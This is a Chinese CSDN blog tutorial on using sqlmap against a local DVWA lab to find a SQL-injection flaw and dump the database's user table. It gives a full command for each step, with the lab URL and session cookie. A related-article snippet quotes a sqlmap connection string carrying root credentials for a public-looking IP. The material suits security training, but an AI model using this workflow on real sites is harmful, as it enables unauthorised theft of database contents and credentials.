7.12、SQLmap—自动化渗透测试工具(kali linux)

最新推荐文章于 2024-07-15 09:44:31 发布
最新推荐文章于 2024-07-15 09:44:31 发布
阅读量1.4k 收藏 26
点赞数 30
分类专栏: 网络安全 文章标签: 自动化 测试工具 运维 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33782021/article/details/135395346
版权

目录

一、准备工作

二、检测漏洞

第一步:获取待检测的url

第二步:获取cookie

第三步:生成命令行

三、获取数据库名

四、获取指定数据库表

五、获取指定数据库列/表项

六、获取数据

        sglmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。

一、准备工作

       1)kali操作系统自带sqlmap,可以直接输入sqlmap执行。

        2)启动apache2和mysql服务

        service apache2 start        # 启动apache2
        service mysql start            # 启动mysql

        3)打开DVWA靶场,将防御等级设置为low

二、检测漏洞

        命令行:sqlmap -u "要检查的网址"  --cookie ="网站登录后,后端返回的cookie值 

        cookie:登录凭证

第一步:获取待检测的url

        http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

第二步:获取cookie

        回到DVWA按:F12  # 进入开发者模式

        security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2

第三步:生成命令行

        该命令行输入到虚拟机的命令框中务必自己输入,不要复制粘贴!!!

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --coolie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2"

三、获取数据库名

        在第一步检测的的命令后面加上:--dbs     

        dbs:database server获取所有数据库名

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" --dbs

四、获取指定数据库表

        在第一步检测的的命令后面加上:-D 数据库名称 --tables         

        -D(Database)指定想要获取的数据库名

        --tables 枚举(遍历)DBMS数据库中的表

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa --tables

五、获取指定数据库列/表项

        在第一步检测的的命令后面加上:-D 数据库名 -T 数据库的表名 --columns  

        --columns 列出表项/例

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --columns

六、获取数据

        把第五步命令后面的--columns换成:--dump  # 读取数据

sqlmap -u "http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=jgf2conucodsct8sjjiduom5m2" -D dvwa -T users --dump

很慢~,等待中ing

爆破到dvwa数据库中user表的用户名及密码,结束!

网运少年
关注
  • 30
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
kali linux里利用SQLmap实现SQL注入
2201_76034619的博客
06-28 5935
安全等级调为low进入SQL Injection(Blind)页面。
kali linuxsqlmap使用教程
热门推荐
龙卷风摧毁停车场
03-30 1万+
SQLMAP 有windows和linux两个版本使用,可跨系统进行操作,语法参数都相同,此处以kali linux为例进行操作 sqlmap --version 查看sqlmap版本 sqlmap -h 查看sqlmap帮助 sqlmap -hh 查看sqlmap高级帮助 使用sqlmap连接数据库 查看数据库banner信息 sqlmap -d "mysql://root:123456@47.208.229.216:3306/tiantianbao" -f --banner 查看数据库用户 sql
渗透工具——kaliSQLMap简介
2301_78006725的博客
09-02 795
首先,SQLMap是一个自动化的SQL注入工具,其主要功能是扫描、发现、利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB。3. 基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;4. 联合查询注入,可以使用union的情况下的注入;
七款最佳的渗透测试工具(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
2402_84205067的博客
07-15 1252
渗透测试工具是模拟对计算机系统、网络或 Web 应用程序的网络攻击的软件应用程序,它们的作用是在实际攻击者之前发现安全漏洞。它们可以作为系统的压力测试,揭示哪些区域可能会受到真正的威胁。本文我将介绍七款最佳的渗透测试工具。01Kali LinuxKali Linux 是一款基于 Debian 的 Linux 发行版,专为数字取证和渗透测试而设计。它预装了各种用于安全审计、网络分析和漏洞评估的工具
kali linuxsqlmap
weixin_30410999的博客
03-02 476
一款开源的命令行自动SQL注入工具,它能够对多种主流数据库进行扫描支持,基于Python环境。 检测动态页面中get/post参数,cookie,http头 数据榨取/文件系统访问 操作系统命令执行 引擎强大,特性丰富 xss检测 支持主流的数据库 五种漏洞检测技术: 基于布尔的盲注检测 基于时间的盲注检测( 'and (select(sleep(20)))a)-- ...
打造高效自动化渗透测试系统:关键步骤与实践
网络安全
03-21 1593
随着当前网络安全威胁的不断扩展与升级,开展渗透测试工作已经成为广大企业组织主动识别安全漏洞与潜在风险的关键过程。然而,传统的人工渗透测试模式对测试人员的专业能力和经验水平有很高的要求,企业需要投入较大的时间和资源才能完成。在此背景下,自动化渗透测试已成为渗透测试领域的重点研究内容,并被认为是人工渗透测试的一种演进形式。
7款热门的自动化渗透测试工具及特点分析
2301_76161259的博客
10-19 281
随着当前网络安全威胁的不断扩展与升级,开展渗透测试工作已经成为众多组织主动识别安全漏洞与潜在风险的关键过程。然而,传统的渗透测试测试人员的经验水平有很强的依赖,对相关知识的掌握有很高的要求,企业需要投入较大的时间和人力成本才能完成。在此背景下,很多企业开始借助自动化渗透测试工具来缓解传统渗透测试的弊端,这些工具能够自动分析目标系统所在网络环境,将安全团队从复杂的测试流程中解放出来,降低了企业开展渗透测试的成本。
sqlmap安装以及运用
m0_69435261的博客
08-24 2616
sqlmap是一个开源的渗透测试工具,它可以自动化检测sql注入漏洞利用sql注入缺陷 接管数据库服务器。
KaLi自带的sqlmap更新
m0_52701599的博客
01-25 7207
kali自带sqlmap更新
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
sqlmap的使用详细讲解
mogexiuluo的博客
05-29 2733
简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的url的sql注入漏洞,内置了很多插件sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞sqlmap使用的sql注入方式:1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行3、基于报错注入:根据页面返回的错误信息。
最新版linux logstash-7.12.0-linux-x86_64.tar.gz
03-30
Linux Logstash 7.12.0 是一个强大的开源数据收集、处理和转发工具,尤其在日志管理和分析领域有着广泛的应用。这个最新版本的软件是专为64位Linux系统设计的,提供了高效的数据流处理能力,帮助系统管理员和开发...
最新版linux elasticsearch-7.12.0-linux-x86_64.tar.gz
03-30
最后,Elasticsearch还提供了Kibana作为可视化工具,用于数据探索、仪表板创建和日志分析。Kibana与Elasticsearch通过HTTP接口通信,帮助用户直观地理解存储在Elasticsearch中的数据。 总的来说,Elasticsearch ...
最新版linux kibana-7.12.0-linux-x86_64.tar.gz
03-30
最新版linux kibana-7.12.0-linux-x86_64.tar.gz最新版linux kibana-7.12.0-linux-x86_64.tar.gz
关于城市轨道交通工程自动化监测智能集成技术的应用.pdf
09-16
城市轨道交通工程自动化监测智能集成技术的应用 城市轨道交通工程自动化监测智能集成技术是指结合轨道交通工程的施工现状,合理布设监测点,并积极运用自动化监测智能集成技术,减少错误监测数据的出现,提高测量...
兆芯+中标linux+数科7.12.txt
12-04
linux中标系统下 wps安装包 无广告和收费提醒 此资源为百度网盘链接 cpu必须是兆芯 其他cpu使用出现任何问题概不负责,请认真阅读说明在安装
网络安全 | 渗透工具SQLmap精讲(全网最详细图文教程)
等风来
01-06 1万+
SQLmap是一款开源的SQL注入工具,用于检测和利用Web应用程序的SQL注入漏洞。SQLmap支持多种数据库管理系统,包括MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等,并支持各种不同的操作系统和平台。留言板项目SQLmap渗透实例 | CSDN@秋说本文以目标账号与其它进行讲解。
CATSploit:一款基于CATS的自动化渗透测试执行工具
公众号【伤心的辣条】资料领取~
03-30 641
关于CATSploit CATSploit是一款基于CATS的自动化渗透测试执行工具,该工具基于网络攻击技术评分(CATS)方法实现其功能,可以在无需渗透测试人员操作的情况下,自动对目标应用执行安全渗透测试
sqlmapkali中的应用及ctfhub实战
2301_77004573的博客
07-08 1309
工具一把嗦固然方便,但仍不能忽视对原理的理解,毕竟常有sqlmap跑不出来的题目,为了检验自己对sql注入的掌握情况,之后也会补一篇手工注入的文章。
kali sqlmap使用教程
08-24
以下是使用Kali Linuxsqlmap的一些基本操作: 1. 首先,你可以使用命令`sqlmap --version`来查看sqlmap的版本号。 2. 如果你需要查看sqlmap的帮助信息,可以使用命令`sqlmap -h`。这将显示基本的帮助信息,包括命令选项和参数的说明。 3. 如果你需要查看更详细的高级帮助信息,你可以使用命令`sqlmap -hh`。这将显示更多的选项和参数以及其用法的详细说明。 4. 如果你想对向后台查询的GET请求进行注入测试,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询"`。这将对指定的URL进行注入测试,并尝试发现任何可能的SQL注入漏洞。 5. 如果你想列出数据库名称,你可以使用命令`sqlmap -u "http://172.16.107.243/pikachu/vul/sqli/sqli_str.php?name=admin&submit=查询" -dbs`。这将列出找到的所有数据库名称。 请注意,使用sqlmap进行SQL注入测试时要格外小心,确保你有合法的授权和权限,并且只在你有合法访问权限的系统上进行测试。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [kali linuxsqlmap使用教程](https://blog.csdn.net/weixin_52084568/article/details/123839776)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [kali工具SQLmap基本使用方法流程以及命令解析](https://blog.csdn.net/FRANXX_02/article/details/127180052)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网运少年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值